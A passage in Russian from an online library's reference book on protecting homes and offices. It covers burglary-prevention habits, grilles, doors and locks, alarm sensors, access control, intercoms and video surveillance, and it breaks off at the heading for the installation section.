Безопасность

В этом разделе онлайновой библиотеки  представлены материалы о промышленных образцах электронных систем ограничения доступа отечественного и зарубежного производства, предназначенных для охраны квартир, домов, офисов, учреждений и т.п.

Содержатся основные технические характеристики и функциональные возможности новейших систем ограничения доступа, в том числе и оборудование, использующее передовую технологию "Touch Memory". В доступной форме приведены сведения о различных домофонных системах и телевизионных системах наблюдения, а также схемы подключения их на охраняемых объектах.

Устройства охраны и сигнализации, устанавливаемые на объектах вместе с кодовыми замками и металлическими решетками, обеспечивают почти 100-процентную защиту от несанкционированных вторжений. В справочнике приведены сведения для изготовления, сборки, монтажа, регулировки и ремонта сторожевых и сигнальных устройств, даны их принципиальные электрические схемы, типы и моточные данные сетевых понижающих трансформаторов питания.

Рассмотрены оригинальные схемные решения электронных и кодовых замков, описана логика их работы и принцип действия. Приведены схемы многофункциональных охранных и пожарных систем, даны рекомендации по их монтажу и настройке.

Диск предназначен для широкого круга пользователей, для всех, кто желает обеспечить надежную защиту своей собственности. Представляет интерес для специалистов, занимающихся вопросами охраны и безопасности различных объектов.

1. Практические схемы обеспечения безопасности.

Раздел 1.

Нынешняя ситуация в стране диктует свои условия, вынуждающие нас вносить коррективы в уже ставшую привычной статью расходов. Если ранее мы платили налоги и рассчитывали на оперативность и компетентность правоохранительных органов в случаях угрозы своей безопасности и безопасности своего имущества, то сейчас вынуждены заботиться о себе сами.

В этом случае на помощь Вам могут прийти мощные механические запоры — дешево, но ненадежно, охранники в камуфляжной форме — недешево и также ненадежно, либо электронные системы охраны, сигнализации и ограничения доступа, которым не нужны деньги, не страшны жара, холод и работа по 24 часа в сутки, которые не имеют вредных привычек и не знают, что такое усталость. Системы охраны, сигнализации и ограничения доступа очень разнообразны и непохожи друг на друга. Не трудно догадаться, что таких электронных устройств существует превеликое множество, отобрать из которого то, что необходимо для решения конкретной задачи по охране вашей собственности очень и очень непросто.

После того как Вы приняли решение о необходимости оборудования своего жилища, офиса или помещений предприятия охранной системой, перед Вами неизбежно встанет вопрос: «Как это сделать? Кому можно довериться? На чем остановить свой выбор?». Естественно, самым очевидным и, в общем-то, правильным решением будет обратиться к профессионалам. Но помощь специалистов высокого уровня стоит недешево. Кроме того, можно нарваться на других «специалистов», помощь которых может еще более усугубить выше положение.

Если Вы считаете, что в состоянии самостоятельно решить эту проблему, эта книга для Вас. В ней Вы найдете информацию о существующих и представленных на российском рынке разнообразных системах охраны и ограничения доступа отечественного и зарубежного производства и принципах их работы, на основании которой сможете сравнить их технические характеристики и стоимостные показатели, получить представление о способах установки и выборе этих систем. Все это, несомненно, сэкономит ваше время и деньги, а также позволит более уверенно чувствовать себя даже при общении со специалистами-профессионалами охранного мира.

Книга является продолжением уже знакомой многим серии справочных пособий, посвященных вопросам защиты собственности и информации. В ней авторами сделана попытка систематизировать обширный разрозненный материал о способах защиты и охраны дома, офиса, предприятия от взлома, порчи, пожара и т. п. В книге приведена информация о различных устройствах ограничения доступа, системах видеонаблюдения, датчиках охранных сигнализаций, от простых устройств до сложных электронных систем.

Первая глава книги посвящена вопросам организации охраны, составу необходимого оборудования, правилах его размещения и монтажа. Даны определения основных понятий и терминов, используемых в области систем охраны, что, несомненно, поможет получить общее представление о возможностях современных электронных устройств охраны и выбрать желаемое.

Во второй главе приводятся технические характеристики и краткое описание систем ограничения доступа, от простых электромеханических замков до сложных компьютеризованных систем, как отечественного, так и зарубежного производства.

Описание и технические характеристики различных типов датчиков и детекторов, применяемых в современных охранных устройствах приведены в третьей главе. Здесь же даны рекомендации по их выбору и использованию.

Четвертая и пятая главы книги посвящены аудио- и видеодомофонным системам, системам видеоконтроля и скрытого наблюдения. Рассмотрены принципы работы, способы и варианты установки этих систем.

Шестая глава будет интересна радиолюбителям и всем тем, кто знаком с электроникой и любит мастерить. Здесь приведены описания принципов работы, электрические схемы, печатные платы и рекомендации по монтажу и настройке различных самодельных электронных охранных устройств для дома и офиса.

Мы надеемся, что книга окажется полезной не только тем, кто хочет защитить свой дом или офис от «незваных гостей», но и специалистам в области охраны.

1. Глава 1. ОБЩИЕ СВЕДЕНИЯ.

ГЛАВА 1. ОБЩИЕ СВЕДЕНИЯ.

 

В настоящее время все большее число людей приходит к выводу, что усилий только государственных правоохранительных органов для решения такой проблемы, как охрана и обеспечение безопасности собственного дома, квартиры, дачи и другой собственности, явно не достаточно.

Выбирая какую-либо систему сигнализации, прежде всего, необходимо иметь определенное представление о целях, задачах и принципах построения систем охраны. Поэтому, прежде чем начать рассмотрение конкретных устройств и систем безопасности, разберемся, что же такое безопасность вообще и из каких составных частей она складывается.

Характерной особенностью нашего времени стало ухудшение криминогенной обстановки. Посягательства против собственности составляют больше половины всех преступлений. Достаточно много случаев, когда надежные, но неправильно

11.jpg

Рис. 1.1. Организация безопасности

установленные технические средства не в состоянии защитить вашу собственность. Поэтому для обеспечения полной безопасности не достаточно просто нашпиговать свой дом или офис сложной и дорогостоящей электроникой. Необходимо еще соблюдать ряд мер и правил в повседневной жизни, выполнение которых совсем не обременительно, однако несоблюдение их может привести порой к тяжелым последствиям.

Обеспечение безопасности связано с проведением ряда организационных и технических мероприятий (рис. 1. 1).

1.1. Организационные мероприятия.

1. 1. Организационные мероприятия.

Многие предпочитают не думать о возможных криминальных ситуациях, так как жить в постоянной тревоге просто не возможно. Однако беспечность порой может привести к тяжелым и чаще всего невосполнимыми потерям. Организационные мероприятия связывают в единое целое все составляющие безопасности. Правильность выбора и проведения организационных мероприятий определяет степень вашей безопасности.

Обычно граждане недооценивают важность организационных мероприятий. Это происходит, с одной стороны, потому, что реализовать их нельзя техническими средствами, а с другой — из-за слабой информированности населения по данному вопросу. Многие даже не догадываются, что соблюдение элементарных правил в значительной степени позволит предотвратить возможный материальный или моральный ущерб, финансовые потери дома или на работе.

Организационные меры не требуют больших материальных затрат, и их эффективность подтверждена жизнью. Одной из первых организационных мер, которую осуществляет каждый из нас, хотя и в разной степени, — оценка возможной угрозы и необходимой степени безопасности. С этим сталкивается каждый человек при получении квартиры, выборе помещения под офис, склад и т. д.

В первую очередь, вы должны представлять, каким образом похитители могут проникнуть в ваше жилище или офис, и определить наиболее слабые и уязвимые участки с точки зрения охраны и безопасности. Особое внимание следует обратить на защищенность входных дверей, окон, балконов, подходов к дому и освещение. Незакрытые двери и окна всегда привлекают внимание злоумышленников. Особенно внимательными следует быть жильцам первых и последних этажей многоэтажных зданий. Для проникновения в квартиру часто используются подростки, которым не составляет большого труда проникнуть внутрь помещения через открытую форточку. Следующий момент, — что может заинтересовать преступника, если он все же проник внутрь помещения. Это, как правило, деньги, драгоценности, аудио-, видео-, оргтехника и т. д.

Исходя из этого, вы должны сделать вывод о целесообразности установки охранной сигнализации. Оценив возможную угрозу и установив электронную систему охраны, не следует успокаиваться. Невыполнение простейших правил может свести на нет все ваши усилия и затраты. Вот некоторые из этих правил:

> - не оставляйте ключи от дома или квартиры в замочной скважине, и уж тем более, не стоит прятать их под коврик или в другое укромное местечко. Этим вы облегчаете непрошеному гостю проникновение в квартиру;

> объясняйте детям правила поведения с незнакомыми людьми, постоянно предупреждайте их не давать никому ключи и не открывать дверь незнакомым людям ни под каким предлогом;

> при утере ключа следует заменить цилиндровый механизм замка или установить новый замок;

> двери должны постоянно находиться в запертом состоянии, даже если вы

вышли покурить или зашли к соседу;

> не открывайте дверь, не осмотрев околодверное пространство в дверной

глазок;

> следите за исправностью освещения возле вашего дома или на лестничной площадке;

> следует договориться с соседями о поочередном присмотре за жильем, такая предосторожность не будет лишней;

> оставляйте дома в ваше отсутствие только тех людей, которых вы и члены

вашей семьи хорошо знаете.

Продумать безопасность помещения, способы хранения ценностей, организацию работ с конфиденциальной информацией можете только вы сами, т. к. система организационных мер является ключом к замку, защищающему вашу собственность.

1.2. Технические мероприятия.

1. 2. Технические мероприятия

Помимо организационных мероприятий, для обеспечения охраны и безопасности необходимо решить комплексную задачу по выбору, установке и эксплуатации технических средств охраны. Системы сигнализации, приобретенные вами, должны надежно срабатывать как при появлении признаков пожара, так и при попытке проникновения в помещение нежелательных личностей. Уже самые простые средства — изгородь или ограждение, через которые трудно перелезть, замки на дверях, которые открываются ключом, а не ногтем, запоры на окнах, несколько удачно расположенных светильников для освещения прилегающей территории, — заставят потенциального преступника сильно призадуматься, прежде чем совершить попытку проникновения. Осуществление технических мер безопасности требует определенных компромиссных решений. Например, правоохранительные органы рекомендуют ставить на окна решетки и устанавливать двойные двери. В то же время пожарные настаивают на том, чтобы в случае необходимости можно было беспрепятственно покинуть помещение. В любом случае всегда нужно следовать здравому смыслу и из всего арсенала методов и технических средств охраны выбирать самый подходящий и сравнительно недорогой.

1.2.1. Механические средства охраны.

1. 2. 1. Механические средства охраны

К простым техническим средствам защиты и охраны помещений относятся ограждения, решетки, двери, замки, дверные глазки, переговорные устройства. Рассмотрим особенности эксплуатации и установки этих технических средств.

Решетки

Не многим известно, что двойными рычажными ножницами можно без особых усилий перекусить стальной прут диаметром 10 мм. Поэтому при выборе решетки следует отдать предпочтение бескаркасной, прутья которой замуровываются непосредственно в стену, с расстоянием между прутьями не более 120 мм и толщиной прута не менее 20 мм. Рисунок решетки может быть любым, но наибольшей защищенностью обладают решетки, прутья которых расположены ромбом или крестом.

Ограждения

Для охраны периметров наиболее распространенным средством является ограждение. Оно может выполнять как охранные, так и декоративные функции. Стационарные ограждения требуют больших материальных затрат и длительного времени на их установку, выполняются они, в основном, из бетонных плит.

В настоящее время все чаще используются быстро монтируемые ограждения, состоящие из металлических сеток или секций различного типа. Высота таких ограждений может достигать 2 м. Кроме того, для ограждений может использоваться колючая проволока отечественного или зарубежного производства.

Двери

Металлическая дверь при ее правильном изготовлении и установке обеспечивает высокую степень защиты помещения. При выборе двери необходимо обратить внимание на качество ее изготовления: полотно двери должно плотно прилегать к дверной коробке и не содержать наружных сварных швов, дверные петли должны иметь противосъемное устройство. При установке двери, особенно в зданиях старой постройки, необходимо проверить наличие пустот в стенах и оценить толщину стен. Подозрительные участки стены должны армироваться стальной полосой.

При установке дополнительной двери с замком, отделяющей несколько квартир от лестничной площадки, рекомендуется установить на ней дверной глазок. Такая дверь является средством коллективной защиты, соблюдение правил пользования которым определяет его эффективность.

Механические замки

Определяющим фактором при выборе замка должна быть не цена, а степень защищенности замка. По способу установки замки подразделяются на врезные и накладные. Врезные замки устанавливаются (врезаются) в тело полотна двери. Накладные замки устанавливаются на поверхности двери, они меньше ослабляющее и требуют меньше времени на установку. По принципу действия современные замки можно разделить на следующие типы: рычажные, цилиндрические, ригельные, замки с цилиндровыми механизмами повышенной секретности.

Принцип работы дверных механических замков практически не изменился с момента их изобретения. В рычажном замке затвор (жесткий запирающий засов) имеет прорезь, разделенную двумя выступами, и прижимную пружину. Поворот ключа с плоской бородкой приводит к подъему рычагов, обеспечивая тем самым движение затвора для закрывания (открывания) замка.

Цилиндрический замок содержит комбинацию штифтов и пружин в двух цилиндрах: большом и маленьком. Большой цилиндр называется корпусом. В него вставляется маленький цилиндр, именуемый сердечником или захватывающим цилиндром. Оба цилиндра имеют два ряда отверстий, как правило, не менее пяти в каждом, которые выстраиваются в одну линию, когда засов закрыт. В каждом отверстии прижимная пружина воздействует на штифты так, что верхний штифт заходит в соответствующее отверстие в сердечнике и не дает ему поворачиваться. Ключ, вставленный в сердечник, поднимает соответствующие штифты и совмещает штифт корпуса и штифт сердечника с узким пространством, называемым линией сдвига. После этого ключ может привести в движение шток захватывающего цилиндра, связанный с засовом механически, и закрыть или открыть замок.

Хороший замок должен иметь, по крайней мере, несколько тысяч возможных кодовых комбинаций ключей и сердечников для обеспечения необходимой защиты.

Для увеличения степени защиты механические замки объединяются с электронными устройствами набора кода, считывателями магнитных или электронных карточек. Для открывания двери с таким замком уже не достаточно наличия только ключа.

1.2.2. Электронные средства охраны.

1. 2. 2. Электронные средства охраны

Для повышения уровня охраны и безопасности используются технические средства более высокого уровня. К ним относятся системы охранной и пожарной сигнализации, системы ограничения доступа, системы телевизионного наблюдения. Отдельно можно выделить автомобильные охранные системы и комплексы на базе ЭВМ, включающие вышеперечисленные системы. Автомобильные охранные устройства подробно описаны в одной из книг данной серии. Поэтому в настоящей книге рассматриваются сигнализационные и охранные системы квартир, офисов, учреждений, складов и т. д.

Перечисленные выше системы могут работать как отдельно, так и в комплексе. Например, телевизионное наблюдение и охрана могут осуществляться либо на большом числе объектов, либо на одном отдельно взятом — квартире или офисе. Системы любой сложности строятся на базе одних и тех же технических

1-2-21.jpg

Рис. 1. 2. Состав технических средств охраны и безопасности

устройств (рис. 1. 2). Для обеспечения охраны и безопасности помещений необходимо выбрать соответствующие технические средства, которые в состоянии обеспечить высокую надежность выполнения возложенных на них задач.

Системы охранно-пожарной сигнализации

Системы охранно-пожарной сигнализации предназначены для определения факта несанкционированного проникновения на охраняемую территорию или появления на ней признаков пожара, выдачи сигнала тревоги на пульт охраны и включения исполнительных устройств (сирены, освещения и т. д.). Системы охранно-пожарной сигнализации включают в себя контрольные панели, извещатели (датчики и детекторы), исполнительные устройства, устройства оповещения (сирены, звонки и т. п.) и источники питания.

Контрольная панель

Контрольная панель (приемно-контрольный прибор) — это центральное устройство системы охранной сигнализации, выполненное на базе микроконтроллера, программа которого определяет все функции системы. Контрольная панель может подключаться к компьютеру для обработки и регистрации сигналов тревоги, автоматического анализа состояния датчиков и функционирования всей системы. Контрольные панели управляют исполнительными устройствами: включают сирену, прожектор, дозваниваются по телефонной линии по заданному номеру.

Извещатели

Для регистрации изменений контролируемого параметра в системах охранной сигнализации используются различные извещатели. Извещатель — это устройство, формирующее определенный сигнал об изменении того или иного контролируемого параметра окружающей среды. Извещатели можно условно разделить на датчики и детекторы. Здесь под датчиками будем понимать извещатели, преобразующие физические величины и характеристики (например, тепло, свет, звук и т. п.) в электрический сигнал. Детекторами же будем называть извещатели, включающие в свой состав датчики, схему обработки сигналов и схему принятия решения.

Простые извещатели (датчики) производят аналоговую обработку сигналов, что не всегда обеспечивает необходимую надежность их работы. Повышение надежности работы датчиков обеспечивается применением цифровых методов обработки сигналов. По принципу действия извещатели можно разделить на следующие типы:

> электроконтактные (фольга, провод);

> магнитоконтактные;

> вибродатчики;

> ультразвуковые;

> радиоволновые;

> фотоэлектрические;

> детекторы битого стекла;

> пассивные и активные инфракрасные (ИК) детекторы движения;

> комбинированные.

Датчики и детекторы позволяют контролировать часть охраняемого объекта (объем, плоскость и т. п.), именуемую зоной.

Электроконтактные датчики

Электроконтактные датчики предназначены для регистрации повреждений и разрушения конструкций, на которых они закреплены: стеклянного полотна окон, дверей, стеклоблоков и т. д. в отапливаемых и не отапливаемых помещениях. Они изготавливаются из тонкой алюминиевой фольги толщиной от 0, 008 до 0, 04 мм и шириной не более 12, 5 мм. Фольга имеет клеевой слой. Иногда для тех же целей вместо фольги используют тонкий провод.

Магнитоконтактные датчики

Магнитоконтактные датчики предназначены для регистрации открывания дверей и окон, на которых они установлены. Датчики бывают двух видов: для наружной и скрытной установки. Они выполнены на основе герконов, контакты которых замыкаются или размыкаются при приближении (удалении) постоянного магнита. Подключаются такие датчики к охранным сигнализациям посредством проводного шлейфа.

Вибродатчики

Вибродатчики предназначены для обнаружения преднамеренного повреждения различных строительных конструкций: бетонных стен и перекрытий, кирпичных стен, деревянных (рамы и двери) и потолочных покрытий, а также сейфов и металлических шкафов. Принцип действия вибродатчиков основан на пьезоэффекте или эффекте электромагнитной индукции, когда постоянный магнит перемещается вдоль обмотки катушки и тем самым наводит в ней переменный ток. В отечественной и зарубежной литературе в зависимости от технической реализации такие датчики называют электромагнитными, магниторезонансными или пьезодатчиками.

Ультразвуковые детекторы

Ультразвуковые детекторы предназначены для охраны закрытых помещений и характеризуются высокой чувствительностью и низкой помехоустойчивостью.

Действие их основано на интерференции ультразвуковых колебаний. В состав ультразвукового детектора входят излучатель и приемник. При закрытых окнах и дверях пространство, контролируемое детектором, ограничено, и в точке расположения приемника формируется устойчивая интерференционная картина. При проникновении какого-либо объекта в помещение устойчивость интерференционной картины нарушается и формируется сигнал тревоги.

Радиоволновые детекторы

Радиоволновые детекторы предназначены для регистрации движения в контролируемой зоне. Принцип действия основан на излучении сигнала сверхвысокой частоты и приеме отраженного сигнала, частота которого изменяется при движении нарушителя (эффект Доплера). Эти приборы используются для охраны закрытых помещений и периметров.

Фотоэлектрические датчики

Фотоэлектрические датчики предназначены для охраны внутреннего и внешнего периметров, бесконтактного блокирования пролетов, дверей, коридоров и т. п. Они состоят из передатчика и приемника, разнесенных вдоль линии охраны, и используют сигнал инфракрасного диапазона с длиной волны порядка 1 мкм.

Детекторы битого стекла

Детекторы битого стекла (ДБС) предназначены для регистрации преднамеренного разрушения стеклянных конструкций: окон, витрин и др. Они реагируют на звук бьющегося стекла и удара о стекло, а также анализируют спектр звуковых шумов в помещении, позволяют бесконтактно контролировать целостность стекла размером более 20х20 см.

Пассивные и активные ИК детекторы движения

Детекторы движения предназначены для обнаружения движения теплового объекта в охраняемой зоне. По принципу действия они подразделяются на пассивные и активные. В настоящее время первые находят более широкое применение. Они имеют регулируемые зоны обнаружения, защиту от ложных срабатываний, вызываемых домашними животными и насекомыми. Различаются пассивные детекторы размером зоны обнаружения (20—360°), методами обработки сигнала, конструкцией и т. п. Активные детекторы используются, как правило, для охраны периметров объектов.

Недостатком самых простых и дешевых ИК детекторов движения является низкая помехоустойчивость — они срабатывают даже при возникновении теплового потока, например, из-за прогрева солнцем помещения.

Более совершенные детекторы лишены этого недостатка. Их надежность и стойкость к тепловым помехам обеспечивается многоканальными пироэлементами и сложной электронной обработкой сигнала в самом детекторе. В простых моделях обработка сигналов осуществляется аналоговыми методами, а в более сложных — цифровыми, например, с помощью встроенного процессора.

Комбинированные детекторы

Комбинированные детекторы - это устройства, использующие два разных физических принципа обнаружения движения. В подавляющем большинстве подобных устройств реализованы пассивный ИК и радиоволновый принципы обнаружения движения. Такие приборы, прежде всего, отличает значительно более высокие характеристики обнаружения при крайне низкой вероятности ложных тревог, по сравнению с приборами, использующими только один из принципов обнаружения движения.

Способы подключения извещателей

Системы охранно-пожарной сигнализации по способу подключения извещателей подразделяются на проводные и беспроводные. В первых связь между всеми устройствами системы осуществляется по проводам. Совокупность соединительных проводов, датчиков, детекторов, соединительных коробок, разъемов и т. п. называется шлейфом. С помощью шлейфов формируются зоны охраны. При своей надежности проводные системы менее гибкие, чем беспроводные. В беспроводных системах каждый извещателъ оснащается собственным передатчиком, а контрольная панель — многоканальным приемником. Надежность связи определяется характеристиками приемника и передатчиков, архитектурой здания и уровнем промышленных радиопомех. Дальность связи обычно составляет от 30 до 1000 м. Беспроводные системы сигнализации более удобны при монтаже и использовании, они могут дополняться устройствами дистанционного управления. На отечественном рынке появились беспроводные системы, использующие для связи и питания промышленную сеть переменного тока напряжением 220 В.

Исполнительные устройства

Исполнительные устройства предназначены для передачи информации пользователю или компетентным органам о срабатывании системы охраны путем подачи звукового и (или) светового сигналов или путем автоматического дозвона по телефонной линии связи до заранее определенных абонентов, а также для управления различными механизмами, обеспечивающими усиление безопасности.

К исполнительным устройствам относятся лампы наружного освещения, прожекторы, стробоскопы, сирены, автодозвонщики, блоки электромагнитных реле, электрозамки и т. п.

Прожекторы, лампы наружного освещения и стробоскопы освещают охраняемую территорию и включаются в случае срабатывания сигнализации, привлекая внимание окружающих. Яркая вспышка стробоскопа в темное время суток или в плохо освещенном помещении может ошеломить преступника и на некоторое время вывести его из строя.

Сирены или ревуны издают громкий звуковой сигнал мощностью до 130 дБ, который может быть услышан на расстоянии нескольких сотен метров. Сирены имеют различное оформление и размеры, некоторые из них оборудованы автономным источником питания. Длительность звучания сирены может быть различной и устанавливается по желанию пользователя.

Устройства автоматического дозвона (автодозвонщики, или коммуникаторы) подключаются к телефонной линии и могут дозваниваться в автоматическом режиме до одного или нескольких абонентов в зависимости от логики работы системы охраны. Блоки электромагнитных реле обеспечивают включение мощных исполнительных механизмов и приборов.

Системы ограничения доступа

Системы ограничения доступа предназначены для автоматизированного допуска в помещения только тех пользователей, которым разрешено посещение данного помещения. Они основаны на использовании аппаратно-программных средств, управляющих передвижением людей и транспорта через контролируемые точки прохода. Это могут быть небольшие системы, на 1—3 двери, или системы, контролирующие перемещение нескольких тысяч человек. Идентификация пользователя происходит посредством предъявления электронной или магнитной карточки либо путем ввода определенного цифрового кода. Система ограничения доступа включает в себя считыватели и контроллеры. Кроме того, к системам ограничения доступа можно отнести и аудиодомофонные системы с дистанционным открыванием двери.

Считыватели

Считыватели необходимы для считывания идентификационного кода и передачи его в контроллер. Эти устройства предназначены для преобразования уникального кода кодового ключа в код стандартного формата, передаваемый для анализа и принятия решения в дверной контроллер. Считыватели различаются физическими принципами реализации (пластиковые карточки с магнитной полосой, штриховым кодом, бесконтактные карточки Proximity, ключи и карточки со встроенными интегральными микросхемами и т. п.). Эти устройства располагаются непосредственно возле дверей и других точек прохода, ограничивающих перемещение пользователей (турникет, шлюз и т. п.). Кроме того, они могут выполнять еще ряд таких функций, как управление открыванием дверей, контроль времени открытия двери, контроль одной зоны охраны.

Контроллеры

Контроллер необходим для управления считывателями и исполнительными устройствами. Он принимает решение о доступе конкретного пользователя, предъявившего устройство идентификации, через конкретную точку прохода в конкретное время на основании хранящейся в нем информации о конфигурации системы и правах пользователей системы ограничения доступа. Устройством идентификации является аналог ключа, подтверждающий полномочность прав его владельца и служащий для управления точкой прохода. Контроллер может обслуживать один или несколько считывателей и располагаться на удалении от них. Несколько контроллеров могут образовывать группу, обслуживающую территориально и логически выделяемую часть системы ограничения доступа (этаж, здание, организацию), и именоваться объектом.

Аудиодомофонная система

Аудиодомофонная система предназначена для ограничения доступа посторонних лиц в частные квартиры, дачи, подъезды многоэтажных домов, офисов, банков, медицинских учреждений и др. Она позволяет вести переговоры с посетителями и дистанционно открывать входную дверь в случае необходимости. Кроме того, современные аудиодомофонные устройства позволяют выполнять функции охранной системы.

Системы видеонаблюдения

Системы видеонаблюдения предназначены для визуального наблюдения за охраняемым объектом с помощью телекамер. Они позволяют следить одновременно за одним или несколькими объектами. Камеры наблюдения могут располагаться как внутри помещения, так и снаружи. Задача системы видеонаблюдения состоит в наглядном представлении видеоинформации об оперативной обстановке на контролируемом объекте. Одной из разновидностей таких систем являются видеодомофоны, выполняющие функции дверного глазка и переговорного устройства одновременно. Системы скрытого наблюдения используют миниатюрные видеокамеры с инфракрасной подсветкой для работы в условиях плохого освещения.

Телевизионные системы наблюдения

Самая простейшая система телевизионного (ТВ) наблюдения включает в себя одну или несколько телевизионных камер и монитор или телевизор. Камеры могут устанавливаться на поворотных устройствах снаружи или внутри помещения и позволяют осуществлять круглосуточное наблюдение за охраняемой территорией. Управление системами телевизионного наблюдения в зависимости от их сложности и обстановки на объекте может быть автоматическим или ручным. Совместно с этими системами можно использовать детекторы движения, системы освещения и другие дополнительные устройства.

В системах видеонаблюдения, рассчитанных на использование нескольких камер, на экране одного монитора можно одновременно отображать изображения от всех камер. Для этих целей используются устройства, именуемые квадраторами (делителями экрана). При необходимости изображение от любой камеры можно оперативно развернуть на весь экран. Для последовательного вывода изображений используются мультиплексоры (коммутаторы), которые последовательно подключают видеокамеры к монитору или телевизору.

Системы ТВ наблюдения позволяют создать гибкую и наращиваемую систему безопасности, в которую могут входить не только компоненты телевизионных систем, но и системы сигнализации и ограничения доступа.

Системы скрытого наблюдения

Системы скрытого наблюдения используются для повышения эффективности охраны и устанавливаются там, где необходимо скрыть факт наблюдения. Задача систем скрытого наблюдения — не изучать посетителей, а контролировать ситуацию на охраняемой территории.

С помощью плоской, размером со спичечный коробок, камеры со специальным объективом типа Pin-Hole (камера с вынесенным входным зрачком) и диаметром входного зрачка 0, 8—2, 0 мм можно вести скрытое наблюдение за любой частью помещения. Такие камеры могут устанавливаться в корпусе часов, на дверном косяке, под обоями и т. п.

Другим, более простым, способом такого наблюдения является использование так называемых видеоглазков со сверхширокоугольной оптикой, предназначенных для монтажа в двери. Внешне они ничем не отличаются от обычных дверных глазков. Питание и передача видеосигнала от этих устройств осуществляется по кабелю или радиоканалу.

Видеодомофоны

Видеодомофон — это устройство, которое выполняет функции дверного глазка и переговорного устройства. Видеодомофон позволяет наблюдать пространство перед входной дверью и беседовать с посетителем, находящимся за дверью. Видеокамеру обычно располагают так, чтобы в ее поле зрения попадал максимум околодверного пространства. Многие видеокамеры оснащены инфракрасной подсветкой для работы в условиях плохой освещенности. При оборудовании видеодомофонами жилых домов полезно создавать два уровня охраны:

входной двери подъезда (этажа) и входной двери каждой квартиры.

Рис. 1.2. Состав технических средств охраны и безопасности

Изображение: 

1.3. Выбор системы охранной сигнализации.

1. 3. Выбор системы охранной сигнализации

Выбирая какую-либо систему сигнализации, прежде всего, необходимо подумать о том, как соотносятся затраты на ее покупку, сборку и установку с ее надежностью и ценностью того, что она будет охранять. Для большинства из нас наиболее ценными являются собственный дом, квартира, автомобиль и (или) дача. Сохранить их от огня и уберечь от кражи можно многими способами, но если злоумышленник — профессионал в своем деле, то никто не сможет полностью гарантировать надежность охраны. Необходимо помнить, что условия его (злоумышленника) деятельности, как нигде, приучают его к осторожности и оттачивают мастерство. Ошибка для него означает быть пойманным, с поличным или в позже, по оставленным уликам.

Единственным способом перехитрить опытного преступника остается установка такой охранной системы, которую бы он никогда до сих пор не встречал. Поэтому к организации защиты своей собственности необходимо подходить творчески. Не пожалейте времени на обдумывание своей идеи перед тем, как потратить хотя бы рубль на приобретение каких-либо компонентов. В зависимости от того, какие функции будут возложены на систему охраны, вы можете выбрать и скомпоновать различные виды устройств и датчиков в единое целое. Ваша система может использовать контактные и магнитные датчики, датчики движения и битого стекла, видеоглазки с видеомагнитофонами, тревожные кнопки, электронные и кодовые замки.

Задачу защиты помещений нужно решать комплексно, чтобы по нескольку раз не переделывать дизайн помещения и коммуникации. Все системы охраны и сигнализации должны устанавливаться с учетом следующих факторов:

> обеспечения высокой надежности;

> обеспечения минимальной стоимости;

Таблица 1. 1. Пример построения охранных систем

1-31.jpg

Условные обозначения

ДБС — детектор битого стекла, КЛ — клавиатура;

Акк — аккумулятор; ДУВ — вибродатчик,

КП — контрольная панель; Тр. — трансформатор;

ПИК — пассивный ИК детектор, ТК — тревожная кнопка;

Тлф. — телефон с автодозвоном; МК — магнитный контакт;

F — пожарный датчик,

+ — наличие устройства в системе охраны,

+* — извещатель может быть отключен в режиме присутствия

Продолжение таблицы 1.1

1-32.jpg

> удобства использования;

> исключения возможного влияния их друг на друга;

> возможности модернизации.

В табл. 1. 1 представлены примерные варианты комплектования систем охраны жилых помещений, приведены ориентировочные стоимости ее составных элементов. Кроме того, показано наиболее логичное, с точки зрения охраны, расположение всех составных частей системы: датчиков, контрольных панелей и

Окончание таблицы 1. 1

1-33.jpg

устройств набора кода. Помните, что от правильности выбора и использования защитных устройств во многом зависит безопасность лично ваша и вашего имущества. Поэтому при оборудовании помещений охранными системами лучше обратиться к специалистам.

Основные методы «работы» квартирных воров заключены в подборе ключей или взломе двери или окна. Особенно внимательным следует быть жителям первого и последнего этажей многоэтажных домов. В настоящее время участились

кражей с балконов, а также кражи с использованием альпинистского снаряжения. Однако большинство преступников проникают в квартиры через дверь. Типовую дверь в наших квартирах взрослый мужчина может выбить плечом, если она недостаточно укреплена. Поэтому защиту своей собственности следует начинать с дверных запоров и укрепления входной двери. Дверь необходимо запирать на два замка разных систем. Замки должны располагаться на расстоянии не менее 50 см друг от друга. При этом лучше использовать накладные замки, т. к. они не ослабляют полотно двери при установке.

В последнее время граждане все большее предпочтение отдают металлическим дверям, которые при правильной установке обеспечивают высокую степень защиты помещения. Стальные двери выпускаются как отечественными, так и зарубежными производителями. На эти двери устанавливаются, как правило, по два замка: ригельный и «цербер».

При использовании электромеханических замков появляется возможность дистанционного управления входной дверью. Это можно сделать, используя домофонную систему. Сочетание электромеханического замка и такой системы позволит вам, не отрываясь от домашних дел или не покидая рабочего места, выяснить личность, намерение посетителя и впустить его, нажав кнопку открывания двери, если вы этого пожелаете.

В табл. 1. 2 приведены примеры систем дистанционного управления замком входной двери с использованием аудио-, видеодомофонов, специальных карточек-жетонов и устройств набора кодов.

Дистанционное управление замком может осуществляться и при помощи устройств ограничения доступа. При этом двери оснащаются устройствами набора кода (клавиатурами) или считывателями. В первом случае пользователь набирает свой личный код и при наличии права доступа открывает двери. Кодовая клавиатура также позволяет вводить код тревоги в случае угрозы пользователю от постороннего лица. Во втором случае используются специальные кодовые бесконтактные или контактные ключи или карточки.

Отдельно можно выделить системы видеонаблюдения и охраны, примеры построения которых и состав оборудования приведены в табл. 1. 3.

В настоящее время системы телевизионного наблюдения не являются экзотикой. Стоимость наиболее простых систем позволяет использовать их в качестве, например, дверного глазка. Наиболее простая система телевизионного наблюдения включает телекамеру и монитор. Вместо монитора можно использовать обычный телевизор, что еще больше уменьшает стоимость системы. Такая система позволяет наблюдать пространство перед входной дверью или на лестничной площадке. Многие телевизионные камеры оснащены инфракрасной подсветкой, что дает возможность получить качественное изображение даже при отсутствии освещения.

Для того чтобы быть компетентным в вопросах выбора и применения какой-либо охранной системы, необходимо знать разновидности выпускаемых промышленностью систем, их технические характеристики и область применения.

Таблица 1. 2. Дистанционное управление замком входной двери

1-34.jpg

Таблица 1. 3. Системы видеонаблюдения и охраны

1-35.jpg

1-36.jpg

Таблица 1.1. Пример построения охранных систем (окончание)

Изображение: 

Таблица 1.1. Пример построения охранных систем (продолжение)

Изображение: 

Таблица 1.1. Пример построения охранных систем

Изображение: 

Таблица 1.2. Дистанционное управление замком входной двери

Изображение: 

Таблица 1.3. Системы видеонаблюдения и охраны (окончание)

Изображение: 

Таблица 1.3. Системы видеонаблюдения и охраны

Изображение: 

1.4. Установка систем охранной сигнализации.

1. 4. Установка систем охранной сигнализации

